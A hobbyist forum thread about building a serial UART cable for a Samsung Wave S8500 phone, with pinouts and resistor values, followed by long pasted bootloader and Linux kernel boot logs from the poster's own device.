Related
As I'm new to Samsung handsets...
Someone tried to play with serial cable and Qualcomm Tools like Memory Debug for instance?
Download Mode not allow USB Diag for Qualcomm... only Samsung Modem is still alive in Download Mode. So Question is. If serial cable, maybe chance to dump something as you can port to UART...
Best Regards
delete.......
I use usb->serial-ttl 3.3V converter with 528K resistor on pins 4-5 for outputing diag message. And you need JIG with 301K resistor for entering to download mode.
Click to expand...
Click to collapse
http://forum.xda-developers.com/showpost.php?p=12689198&postcount=181
Thanx for this info, but tooo difficult for me to understand.
Please help to make such cable for research... or maybe their are existing cables to buy?
I need something like this:
http://www.badanation.de/topic.php?t=1616&page=fst_unread&highlight=widerstand
Such Pictures would be nice:
http://h-3.abload.de/img/p1000660eei7.jpg
I need FULL Pinout please for S8500.
Thanx in advance.
Best Regards
You mean cable/plug for enter download mode? You can buy it. For example in Poland I can buy this for 12 zlotys = 3 euro + delivery costs.
I found that, for Galaxy S, but is possible this is the same
forum.xda-developers.com/showthread.php?t=819551
I "need" alternate cable for communication between PC and S8500.
Also FULL Pinout is welcome.
Best Regards
http://forum.xda-developers.com/showthread.php?t=820275
Here seems few infos... maybe also work for S8500.
Best Regards
After I saw successfully log from srg.mstr.
Thank you very much.
http://forum.xda-developers.com/showpost.php?p=13426392&postcount=183
Less then 1 Euro for male Connector:
http://www.conrad.de/ce/de/product/733923/MICRO-USB-STECKER-TYP-B-5POL/SHOP_AREA_40306
So I will buy few Connectors...
Now I will make checklist for other parts and prices. As I have no cables at home to cut...
Best Regards
TX<-->2
RX<-->3
GND<-->5
resistor between 4<-->5
http://forum.xda-developers.com/showpost.php?p=13293404&postcount=174
Will try to make such cable this year... in 2013 really.
Checklist...
http://www.conrad.de/ce/de/product/...Kabelmontage-ohne-Gehaeuse-BKL-Electronic-Inh
.
.
.
Best Regards
Will try to make such cable this year...
Click to expand...
Click to collapse
Uupsi, only 2 months left... but I have found other way for Bootlog...
via JTAG RAM dump... something above 0x40000000...
Looks like this:
http://forum.xda-developers.com/showpost.php?p=47037737&postcount=34
Best Regards
2013 soon over... but Mission UART is not over...
New attempt... for 2014...
It seems now "cheap" USB stuff available... based on PL2303... symbolic Photo attached...
According to this Pic...
http://forum.xda-developers.com/showpost.php?p=13426392&postcount=183
Other idea is to solder direct to RX TX and GND on PCB... instead resistor...
Maybe...
Best Regards
Short tested with 3 wires soldered direct to RX TX and Ground under battery/label...
Hmm... first test failed with WinComm... maybe my settings are wrong, will try other Tool for Logging...
Best Regards
Btw...
Never seen S5250 or S8600 user trying to capture data over UART...
:silly:
Code:
[PAM: ] OneNAND physical base address : 0xb0000000
[PAM: ] OneNAND virtual base address : 0xb0000000
[PAM: ] FSR_PAM_InitNANDController Success!!
[PAM: ] --FSR_PAM_Init
[BM : ] FSR_BML_GetFullPartI() is completed
[BM : ] stPartI.nNumOfPartEntry : 7
[BM : ] 1th PartEntrt(nAttr:0x1002)(nID:0x0)
[BM : ] [1th] pPEntry->n1stVun : 1
[BM : ] [1th] pPEntry->nNumOfUnits : 7
[BM : ] [1th] pPEntry->nLoadAddr : 0x0
+-------------------------------+
| Bootloader Shadowing FINISHED |
+-------------------------------+
Launch Image at 0x42480000
[BOOT_V1.0 (May 28 2010, 21:22:23)]
SelectBootingMode: H/W...0xe.
[BOOT] ARMCLK: 400000 KHz, MSYSHCLK 200000 KHz,MSYSPCLK: 100000 KHz, [BOOT] DSYSHCLK 166750 KHz,DSYSPCLK: 83375 KHz,PSYSHCLK: 133400 KHz, PSYSPCLK: 66700 KHz,SYSCON_A2M: 200000 KHz
+++FIMD_Drv_INITIALIZE
FIMD_Drv_ChangeMode: MDNIE_MODE
Frame Rate:62 SCLK_FIMD:133400 kHz ClkDiv:4
S6E63M0 : LDI_Pentile_Set_Change Pentile_Value =6c
---FIMD_Drv_INITIALIZE
---FIMD_Drv_SetWinOnOff(WIN4:1)
LCD initialize Finished
Flash_Unlock failed
Poweron status - c0
FSA9480 0x03 Register = 0
FSA9480 0x0A Register = 0
FSA9480 0x0B Register = 0
FSA9480 0x07 Register = 1f
Used WinComm as Tool...
Stupid me not realized that TX connect to RX and RX to TX... :cyclops:
Best Regards
Code:
[PAM: ] ++FSR_PAM_Init
[PAM: ] OneNAND physical base address : 0xb0000000
[PAM: ] OneNAND virtual base address : 0xb0000000
[PAM: ] FSR_PAM_InitNANDController Success!!
[PAM: ] --FSR_PAM_Init
bl3_info_block 1 and 2 not found, Load BL3
+-------------------------------+
| Bootloader Shadowing FINISHED |
+-------------------------------+
Launch Image at 0x42080000
[BOOT_V1.0 (Jan 5 2012, 19:08:14)]
SelectBootingMode: H/W...0xe.
[BOOT] ARMCLK: 400000 KHz, MSYSHCLK 200000 KHz,MSYSPCLK: 100000 KHz, [BOOT] DSYSHCLK 166750 KHz,DSYSPCLK: 83375 KHz,PSYSHCLK: 133400 KHz, PSYSPCLK: 66700 KHz,SYSCON_A2M: 200000 KHz
+++FIMD_Drv_INITIALIZE
FIMD_Drv_ChangeMode: MDNIE_MODE
Frame Rate:62 SCLK_FIMD:133400 kHz ClkDiv:4
S6E63M0 : LDI_Pentile_Set_Change Pentile_Value =6c
---FIMD_Drv_INITIALIZE
---FIMD_Drv_SetWinOnOff(WIN4:1)
LCD initialize Finished
Flash_Unlock failed
Poweron status - 0
FSA9480 0x03 Register = 0
FSA9480 0x0A Register = 4
FSA9480 0x0B Register = 0
FSA9480 0x07 Register = 1f
Display_LSI_Boot : disp_Main_Clean
Display_LSI_Boot : disp_Main_Clean_All
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_dimming_backlight
LDI_S6E63M0_Set_Brightness is Return (Level: 1)
Display_LSI_Boot : disp_dimming_backlight
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
+SDHC_Open(Ch0)
univ_SD_MEM_PowerOnDevice() : Power On
univ_SD_MEM_PowerOnDevice(ch0) : MASSMEMORY_EN Power On
[SDHC] MPLL source clock from SYSCON : 667000000Hz
[SDHC] SDHC(ch0) source clock from SYSCON : 47642000Hz
[SDHC] SDHC(ch0) Operating Clock : 372203Hz
[SDHC][MMC]byte mode
SD_MEM_Phy_CMD2(ch0) : CID(127~0) : 0x150100, 0x4d324731, 0x44441655, 0x3c7886d
SD_MEM_Phy_Check_moviNAND_Version(ch0) : PRV - 0x16
MMC_Spec = 4
----------------CSD Version 1.0--------in low level-------------
channel: [0]
One Block Size: [512]Byte
Total card Block Count = [4014080]
Total card Capacity Size = [1960]MB
---------------------------------------------------
SD_HostCtrl_IssueCommand[ch0] not SDclk off, cmd13, SD_CLK_CTRL:0x400f
SD_MEM_Phy_TransferState(ch0) :High: Tx : SD_FeedBackClock_BasicDelay
SD_MEM_Phy_TransferState(ch0) :High: Rx : SD_FeedBackClock_InverterDelay
[SDHC] MPLL source clock from SYSCON : 667000000Hz
[SDHC] SDHC(ch0) source clock from SYSCON : 47642000Hz
[SDHC] SDHC(ch0) Operating Clock : 47642000Hz
SD_HostCtrl_IssueCommand[ch0] not SDclk off, cmd13, SD_CLK_CTRL:0xf
SD_HostCtrl_IssueCommand[ch0] not SDclk off, cmd13, SD_CLK_CTRL:0xf
-SDHC_Open(Ch0)
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
DRV_modem_reset!!!!!!!!!!!!!!!!!
DRV_Send_DBL!!!!!!!!!!!!!!!!!
[DLOAD] Download Completed !!!
DRV_Wait_ModemInit!!!!!!!!!!!!!!!!!
DRV_CopyQSCBootBinary!!!!!!!!!!!!!!!!!
DRV_Send_BootBinaryCopyComplete!!!!!!!!!!!!!!!!!
DRV_Modem_BootingStart retry count = 0.
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Uncompressing Linux... done, booting the kernel.
<6>Initializing cgroup subsys cpu
<5>Linux version 3.0.86-g5b25f8d ([email protected]) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #1 PREEMPT Tue Nov 5 22:35:53 CET 2013
CPU: ARMv7 Processor [412fc082] revision 2 (ARMv7), cr=10c53c7d
CPU: VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine: wave
Memory policy: ECC disabled, Data cache writeback
CPU S5PV210/S5PC110 (id 0x43110222)
<7>s5pv210_init_clocks: initializing clocks
<6>S3C24XX Clocks, Copyright 2004 Simtec Electronics
<4>s3c24xx_register_clock: new clock sclk_csis, id -1, dev (null) uses same enable bit as mout_csis, id -1, dev (null)
<4>s3c24xx_register_clock: new clock lcd, id -1, dev (null) uses same enable bit as sclk_fimd, id -1, dev (null)
<4>s3c24xx_register_clock: new clock mfc, id -1, dev (null) uses same enable bit as sclk_mfc, id -1, dev (null)
<4>s3c24xx_register_clock: new clock iis, id 0, dev (null) uses same enable bit as i2s_v50, id 0, dev (null)
<7>s5pv210_setup_clocks: registering clocks
<7>s5pv210_setup_clocks: clkdiv0 = 14131330, clkdiv1 = 00400400
<7>s5pv210_setup_clocks: xtal is 24000000
<6>S5PV210: PLL settings, A=800000000, M=667000000, E=80000000 V=54000000<6>S5PV210: ARMCLK=800000000, HCLKM=200000000, HCLKD=166750000
HCLKP=133400000, PCLKM=100000000, PCLKD=83375000, PCLKP=66700000
<6>sclk_dmc: source is mout_mpll (1), rate is 166750000
<6>sclk_onenand: source is hclk_dsys (1), rate is 83375000
<6>sclk: source is mout_mpll (6), rate is 133400000
<6>sclk: source is mout_mpll (6), rate is 66700000
<6>sclk: source is mout_mpll (6), rate is 66700000
<6>sclk: source is mout_mpll (6), rate is 66700000
<6>sclk_mixer: source is sclk_dac (0), rate is 54000000
<6>sclk_fimc: source is ext_xtal (0), rate is 24000000
<6>sclk_fimc: source is ext_xtal (0), rate is 24000000
<6>sclk_fimc: source is ext_xtal (0), rate is 24000000
<6>sclk_cam: source is xusbxti (1), rate is 24000000
<6>sclk_cam: source is ext_xtal (0), rate is 24000000
<6>sclk_fimd: source is mout_mpll (6), rate is 133400000
<6>sclk_mmc: source is mout_mpll (6), rate is 51307692
<6>sclk_mmc: source is mout_mpll (6), rate is 47642857
<6>sclk_mmc: source is mout_mpll (6), rate is 47642857
<6>sclk_mmc: source is mout_mpll (6), rate is 47642857
<6>sclk_mfc: source is sclk_a2m (0), rate is 200000000
<6>sclk_fimg2d: source is sclk_a2m (0), rate is 200000000
<6>sclk: source is mout_mpll (1), rate is 66700000
<6>sclk_csis: source is ext_xtal (0), rate is 24000000
<6>sclk_spi: source is mout_epll (7), rate is 80000000
<6>sclk_spi: source is mout_epll (7), rate is 80000000
<6>sclk_pwi: source is ext_xtal (0), rate is 24000000
<6>sclk_pwm: source is ext_xtal (0), rate is 24000000
<6>sclk_mdnie: source is mout_mpll (6), rate is 166750000
<6>sclk_mdnie_pwm: source is ext_xtal (0), rate is 24000000
<6>s5p: 11534336 bytes system memory reserved for mfc at 0x24500000, 0-bank base(0x24500000)
<6>s5p: 11534336 bytes system memory reserved for mfc at 0x4f3f4000, 1-bank base(0x4f3f4000)
<6>s5p: 11534336 bytes system memory reserved for fimc0 at 0x4e8f4000, 1-bank base(0x4e8f4000)
<6>s5p: 11534336 bytes system memory reserved for fimc2 at 0x4ddf4000, 1-bank base(0x4ddf4000)
<6>s5p: 4194304 bytes system memory reserved for jpeg at 0x24500000, 0-bank base(0x24500000)
<6>s5p: 7680000 bytes system memory reserved for fimd at 0x4d6a1000, 1-bank base(0x4d6a1000)
<7>On node 0 totalpages: 72621
<7> Normal zone: 1534 pages used for memmap
<7> Normal zone: 0 pages reserved
<7> Normal zone: 71087 pages, LIFO batch:15
<7>pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768
<7>pcpu-alloc: [0] 0
Built 1 zonelists in Zone order, mobility grouping on. Total pages: 71087
<5>Kernel command line: init=/init loglevel=4
<6>PID hash table entries: 2048 (order: 1, 8192 bytes)
<6>Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
<6>Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
<6>Memory: 69MB 214MB 0MB = 283MB total
<5>Memory: 272496k/325052k available, 17988k reserved, 0K highmem
<5>Virtual kernel memory layout:
vector : 0xffff0000 - 0xffff1000 ( 4 kB)
fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
DMA : 0xff000000 - 0xffe00000 ( 14 MB)
vmalloc : 0xf0000000 - 0xfc000000 ( 192 MB)
lowmem : 0xc0000000 - 0xeff00000 ( 767 MB)
modules : 0xbf000000 - 0xc0000000 ( 16 MB)
.init : 0xc0008000 - 0xc0617000 (6204 kB)
.text : 0xc0617000 - 0xc0ce8000 (6980 kB)
.data : 0xc0ce8000 - 0xc0d34880 ( 307 kB)
.bss : 0xc0d348a4 - 0xc0e76ad8 (1289 kB)
<6>SLUB: Genslabs=11, HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
<6>Preemptible hierarchical RCU implementation.
<6>NR_IRQS:339
<6>VIC @fc000000: id 0x00041192, vendor 0x41
<6>VIC @fc010000: id 0x00041192, vendor 0x41
<6>VIC @fc020000: id 0x00041192, vendor 0x41
<6>VIC @fc030000: id 0x00041192, vendor 0x41
<6>mult[140737]
<6>max_delta_ns[2937815369]
<6>min_delta_ns[30517]
<6>rate[32768]
<6>HZ[256]
<6>Console: colour dummy device 80x30
<6>console [tty0] enabled
<6>Calibrating delay loop... <c>795.12 BogoMIPS (lpj=1554432)
<6>pid_max: default: 32768 minimum: 301
<6>Mount-cache hash table entries: 512
<6>Initializing cgroup subsys debug
<6>Initializing cgroup subsys cpuacct
<6>Initializing cgroup subsys freezer
<6>CPU: Testing write buffer coherency: ok
<6>hw perfevents: enabled with ARMv7 Cortex-A8 PMU driver, 5 counters available
<6>print_constraints: dummy:
<6>NET: Registered protocol family 16
<6>ram_console: got buffer at 4ff00400, size fec00
<6>ram_console: uncorrectable error in header
<6>ram_console: no valid data in buffer (sig = 0xfeffdfff)
<6>console [ram-1] enabled
<6>S5PC110 Hardware version : EVT1
<6>HWREV is 0xf
S3C Power Management, Copyright 2004 Simtec Electronics
<6>pmstats at 4ffff000
<3>invalid media device
<3>invalid media device
<6>hw-breakpoint: debug architecture 0x4 unsupported.
<6>S5PV210: Initializing architecture
<6>s3c24xx-pwm s3c24xx-pwm.0: tin at 66700000, tdiv at 66700000, tin=divclk, base 0
<6>s3c24xx-pwm s3c24xx-pwm.1: tin at 66700000, tdiv at 66700000, tin=divclk, base 8
<6>s3c24xx-pwm s3c24xx-pwm.2: tin at 66700000, tdiv at 66700000, tin=divclk, base 12
<6>s3c24xx-pwm s3c24xx-pwm.3: tin at 66700000, tdiv at 66700000, tin=divclk, base 16
<6>print_constraints: pd_audio_supply: 5000 mV normal
<6>print_constraints: pd_cam_supply: 5000 mV normal
<6>print_constraints: pd_tv_supply: 5000 mV normal
<6>print_constraints: pd_lcd_supply: 5000 mV normal
<6>print_constraints: pd_g3d_supply: 5000 mV normal
<6>print_constraints: pd_mfc_supply: 5000 mV normal
<6>bio: create slab <bio-0> at 0
<5>SCSI subsystem initialized
<6>usbcore: registered new interface driver usbfs
<6>usbcore: registered new interface driver hub
<6>usbcore: registered new device driver usb
<6>i2c-gpio i2c-gpio.4: using pins 247 (SDA) and 246 (SCL)
<6>i2c-gpio i2c-gpio.5: using pins 203 (SDA) and 204 (SCL)
<3>max8998 6-0066: No interrupt base specified, no interrupts
<3>i2:10, buck2_idx:0
<6>print_constraints: VALIVE_1.2V: 1200 mV
<6>print_constraints: VUSB_1.1V: 1100 mV
<6>print_constraints: VADC_3.3V: 3300 mV
<6>print_constraints: VTF_2.8V: 2800 mV
<6>print_constraints: VLCD_1.8V: 1800 mV
<6>print_constraints: VUSB_3.3V: 3300 mV
<6>print_constraints: VCC_2.8V_PDA: 2800 mV
<6>print_constraints: CAM_AF_2.8V: 2800 mV
<6>print_constraints: CAM_SENSOR_1.2V: 1200 mV
<6>print_constraints: CAM_SENSOR_A2.8V: 2800 mV
<6>print_constraints: CAM_ISP_1.8V: 1800 mV
<6>print_constraints: CAM_ISP_HOST_2.8V: 2800 mV
<6>print_constraints: VGA_DVDD_1.8V: 1800 mV
<6>print_constraints: VCC_3.0V_LCD: 2800 <--> 3200 mV at 3200 mV
<6>print_constraints: VDD_ARM: 750 <--> 1500 mV at 1200 mV
<6>print_constraints: VDD_INT: 750 <--> 1500 mV at 1100 mV
<6>print_constraints: VCC_1.8V: 1800 mV
<6>print_constraints: CAM_ISP_CORE_1.2V: 1200 mV
<6>print_constraints: USB_VBUS_AP:
<6>print_constraints: USB_VBUS_CP:
<6>i2c-gpio i2c-gpio.6: using pins 206 (SDA) and 209 (SCL)
<6>i2c-gpio i2c-gpio.7: using pins 201 (SDA) and 202 (SCL)
<6>i2c-gpio i2c-gpio.8: using pins 42 (SDA) and 43 (SCL)
<6>i2c-gpio i2c-gpio.11: using pins 114 (SDA) and 98 (SCL)
<6>i2c-gpio i2c-gpio.12: using pins 199 (SDA) and 200 (SCL)
<6>s3c-i2c s3c2440-i2c.0: i2c-0: S3C I2C adapter
<6>s3c-i2c s3c2440-i2c.1: i2c-1: S3C I2C adapter
<6>s3c-i2c s3c2440-i2c.2: i2c-2: S3C I2C adapter
<6>Advanced Linux Sound Architecture Driver Version 1.0.24.
<6>Bluetooth: Core ver 2.16
<6>NET: Registered protocol family 31
<6>Bluetooth: HCI device and connection manager initialized
<6>Bluetooth: HCI socket layer initialized
<6>Bluetooth: L2CAP socket layer initialized
<6>Bluetooth: SCO socket layer initialized
<6>Switching to clocksource clock_source_systimer
<6>cfg80211: Calling CRDA to update world regulatory domain
<6>Switched to NOHz mode on CPU #0
<6>NET: Registered protocol family 2
<6>IP route cache hash table entries: 4096 (order: 2, 16384 bytes)
<6>TCP established hash table entries: 16384 (order: 5, 131072 bytes)
<6>TCP bind hash table entries: 16384 (order: 4, 65536 bytes)
<6>TCP: Hash tables configured (established 16384 bind 16384)
<6>TCP reno registered
<6>UDP hash table entries: 256 (order: 0, 4096 bytes)
<6>UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
<6>NET: Registered protocol family 1
<6>PMU: registered new PMU device of type 0
<4>clk_get: could not find clock emu_src_ck for dev s5pv210_etb_device+0x0/0x100 (etb)
<6>wake enabled for irq 165
<6>wake disabled for irq 165
<6>S5PV210 ADC driver, (c) 2010 Samsung Electronics
<6>Loaded driver for PL330 DMAC-0 s3c-pl330
<6> DBUFF-64x8bytes Num_Chans-8 Num_Peri-2 Num_Events-32
<6>Loaded driver for PL330 DMAC-1 s3c-pl330
<6> DBUFF-8x4bytes Num_Chans-8 Num_Peri-32 Num_Events-32
<6>Loaded driver for PL330 DMAC-2 s3c-pl330
<6> DBUFF-8x4bytes Num_Chans-8 Num_Peri-32 Num_Events-32
<6>ashmem: initialized
<6>ROMFS MTD (C) 2007 Red Hat, Inc.
<7>yaffs: yaffs built Nov 5 2013 22:34:00 Installing.
<6>msgmni has been set to 532
<6>io scheduler noop registered
<6>io scheduler deadline registered
<6>io scheduler row registered (default)
<6>io scheduler cfq registered
<6>io scheduler sio registered
MDNIE INIT ..........
<6>S3C MDNIE Driver, (c) 2010 Samsung Electronics
MDNIE INIT SUCCESS Addr : 0xf003c000
IELCD INIT ..........
<6>S3C IELCD Driver, (c) 2010 Samsung Electronics
IELCD INIT SUCCESS Addr : 0xf0040000
<6>s3cfb s3cfb: [fb2] dma: 0x4db06000, cpu: 0xf0400000, size: 0x002ee000
<6>FIMD src sclk = 166750000
<6>s3cfb s3cfb: pixclock adjusted from 39019 to 41979
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x84), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x90), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x94), data(0xfff)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x98), data(0x5c)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x9c), data(0x10)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xac), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xb4), data(0x3ff)
[mDNIe] mDNIe_Set_Mode: current_mDNIe_UI(6), current_mDNIe_OutDoor_OnOff(0)
<6>s3cfb_late_resume is called
<6>FIMD src sclk = 166750000
<6>s3cfb s3cfb: pixclock adjusted from 41979 to 41979
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x84), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x90), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x94), data(0xfff)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x98), data(0x5c)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x9c), data(0x10)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xac), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xb4), data(0x3ff)
[mDNIe] mDNIe_Set_Mode: current_mDNIe_UI(6), current_mDNIe_OutDoor_OnOff(0)
<3>panel_reset_lcd
<6>s3cfb_late_resume is complete
<6>s3cfb s3cfb: registered successfully
<6>s5pv210-uart.0: s3c2410_serial0 at MMIO 0xe2900000 (irq = 16) is a S3C6400/10
<6>s5pv210-uart.1: s3c2410_serial1 at MMIO 0xe2900400 (irq = 20) is a S3C6400/10
<6>s5pv210-uart.3: s3c2410_serial3 at MMIO 0xe2900c00 (irq = 28) is a S3C6400/10
PA FB = 0x4DB06000, bits per pixel = 32
screen width=480 height=800 va=0xedb06000 pa=0x4db06000
xres_virtual = 480, yres_virtual = 1600, xoffset = 0, yoffset = 0
fb_size=3072000
Back frameBuffer[0].VAddr=edc7d000 PAddr=4dc7d000 size=1536000
No space for NV12 video carveout
<6>brd: module loaded
<6>loop: module loaded
<6>Android kernel panic handler initialized (bind=kpanic)
<6>sec_jack_probe : Registering jack driver
<6>wake enabled for irq 38
<6>sec_jack_init_jack_state<6>sec_jack_set_micbias_state: HWREV=15, on=1
<6>handle_jack_not_inserted
<6>sec_jack_set_micbias_state: HWREV=15, on=0
<6>sec_jack_set_micbias_state: HWREV=15, on=0
<6>wake enabled for irq 167
<6>fsa9480 7-0025: dev1: 0x4, dev2: 0x0
<4>i2c-core: driver [fsa9480] using legacy suspend method
<4>i2c-core: driver [fsa9480] using legacy resume method
<6>modem_io_init done
<6>[MODEM] bp_irq() - PHONE_ACTIVE interrupt, 1 occurence
<6>wake enabled for irq 47
<6>wake enabled for irq 43
<6>modemctl probed
<6>Muxed OneNAND 512MB 1.8V 16-bit (0x50)
<6>OneNAND version = 0x013e
<7>Chip support all block unlock
<7>Chip has 4KiB pagesize
<7>Chip has cache program feature
<6>Scanning device for bad blocks
<7>onenand_bbt_wait: ecc 0xaaaa ctrl 0x0400 intr 0x8080 addr1 0x1dd addr8 0x0
<6>OneNAND eraseblock 477 is an initial bad block
<7>onenand_bbt_wait: ecc 0xaaaa ctrl 0x0400 intr 0x8080 addr1 0x6cf addr8 0x0
<6>OneNAND eraseblock 1743 is an initial bad block
<7>onenand_bbt_wait: ecc 0xaaaa ctrl 0x0400 intr 0x8080 addr1 0x73f addr8 0x0
<6>OneNAND eraseblock 1855 is an initial bad block
<6>OneNAND eraseblock 2047 is an initial bad block
<5>Creating 2 MTD partitions on "(null)":
<5>0x00001e700000-0x00001ec00000 : "nv_data"
<5>0x000003300000-0x000003600000 : "fota"
<6>tl2796: c0, b-6bea38dc, got v 2051000, factory wants 2051000
<6>tl2796: c1, b-7f519b2b, got v 2044000, factory wants 2044000
<6>tl2796: c2, b-ae797fc2, got v 1491000, factory wants 1491000
<6>tl2796_probe successfully probed
<6>PPP generic driver version 2.4.2
<6>PPP Deflate Compression module registered
<6>PPP BSD Compression module registered
<6>PPP MPPE Compression module registered
<6>NET: Registered protocol family 24
<6>tun: Universal TUN/TAP device driver, 1.6
<6>tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
<6>s3c-udc : S3C HS USB Device Controller Driver, (c) 2008-2009 Samsung Electronics
s3c-udc : version 15 March 2009 (DMA Mode)
<6>android_usb gadget: Mass Storage Function, version: 2009/09/11
<6>android_usb gadget: Number of LUNs=2
<6> lun0: LUN: removable file: (no medium)
<6> lun1: LUN: removable file: (no medium)
<6>android_usb gadget: android_usb ready
<7>Registered gadget driver 'android_usb'
<6>input: gpio-keys as /devices/platform/gpio-keys.0/input/input0
<6>input: s5pv210-keypad as /devices/platform/s5pv210-keypad/input/input1
<6>usbcore: registered new interface driver xpad
<6>usbcore: registered new interface driver usb_acecad
<6>acecad: v3.2:USB Acecad Flair tablet driver
<6>usbcore: registered new interface driver aiptek
<6>aiptek: v2.3 (May 2, 2007):Aiptek HyperPen USB Tablet Driver (Linux 2.6.x)
<6>aiptek: Bryan W. Headley/Chris Atenasio/Cedric Brun/Rene van Paassen
<6>usbcore: registered new interface driver gtco
GTCO usb driver version: 2.00.0006<6>usbcore: registered new interface driver hanwang
<6>usbcore: registered new interface driver kbtab
<6>kbtab: v0.0.2:USB KB Gear JamStudio Tablet driver
<6>usbcore: registered new interface driver wacom
<6>wacom: v1.52:USB Wacom tablet driver
<6>input: mxt224_ts_input as /devices/virtual/input/input2
<6>Atmel MXT224 2-004a: family = 0x80, variant = 0x1, version = 0x16, build = 171
<6>bma023 5-0038: bma023 found
<6>bma023 5-0038: al_version=2, ml_version=1
<6>input: accelerometer_sensor as /devices/virtual/input/input3
<3>gp2a: proximity val = 1
<6>input: proximity as /devices/virtual/input/input4
<6>input: orientation_sensor as /devices/virtual/input/input5
<6>max8998-rtc max8998-rtc: RTC CHIP NAME: max8998-rtc
S3C24XX RTC, (c) 2004,2006 Simtec Electronics
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>using rtc device, s3c, for alarms<6>s3c-rtc s3c2410-rtc: rtc core: registered s3c as rtc0
<6>i2c /dev entries driver
<6>lirc_dev: IR Remote Control driver registered, major 251
<6>IR NEC protocol handler initialized
<6>IR RC5(x) protocol handler initialized
<6>IR RC6 protocol handler initialized
<6>IR JVC protocol handler initialized
<6>IR Sony protocol handler initialized
<6>IR RC5 (streamzap) protocol handler initialized
<6>IR LIRC bridge handler initialized
<6>Linux video capture interface: v2.00
<6>mfc_init: <6>S5PC110 MFC Driver, (c) 2009 Samsung Electronics
<6>S3C JPEG Driver, (c) 2007 Samsung Electronics
<6>JPEG driver for S5PV210
<4>i2c-core: driver [s5p_ddc] using legacy suspend method
<4>i2c-core: driver [s5p_ddc] using legacy resume method
<4>i2c-core: driver [Si4709] using legacy suspend method
<4>i2c-core: driver [Si4709] using legacy resume method
<6>device-mapper: uevent: version 1.0.3
<6>device-mapper: ioctl: 4.20.0-ioctl (2011-02-02) initialised: [email protected]
<6>Bluetooth: HCI UART driver ver 2.2
<6>Bluetooth: HCI H4 protocol initialized
<6>cpuidle: using governor ladder
<6>cpuidle: using governor menu
<6>sdhci: Secure Digital Host Controller Interface driver
<6>sdhci: Copyright(c) Pierre Ossman
<6>s3c-sdhci s3c-sdhci.0: clock source 0: hsmmc (133400000 Hz)
<6>s3c-sdhci s3c-sdhci.0: clock source 2: sclk_mmc (51307692 Hz)
<6>mmc0: SDHCI controller on samsung-hsmmc [s3c-sdhci.0] using ADMA
<6>s3c-sdhci s3c-sdhci.1: clock source 0: hsmmc (133400000 Hz)
<6>s3c-sdhci s3c-sdhci.1: clock source 2: sclk_mmc (47642857 Hz)
<6>mmc1: SDHCI controller on samsung-hsmmc [s3c-sdhci.1] using ADMA
<6>s3c-sdhci s3c-sdhci.2: clock source 0: hsmmc (133400000 Hz)
<6>s3c-sdhci s3c-sdhci.2: clock source 2: sclk_mmc (47642857 Hz)
<6>mmc2: SDHCI controller on samsung-hsmmc [s3c-sdhci.2] using ADMA
<6>usbcore: registered new interface driver usbhid
<6>usbhid: USB HID core driver
<6>logger: created 256K log 'log_main'
<6>logger: created 256K log 'log_events'
<6>logger: created 256K log 'log_radio'
<6>logger: created 256K log 'log_system'
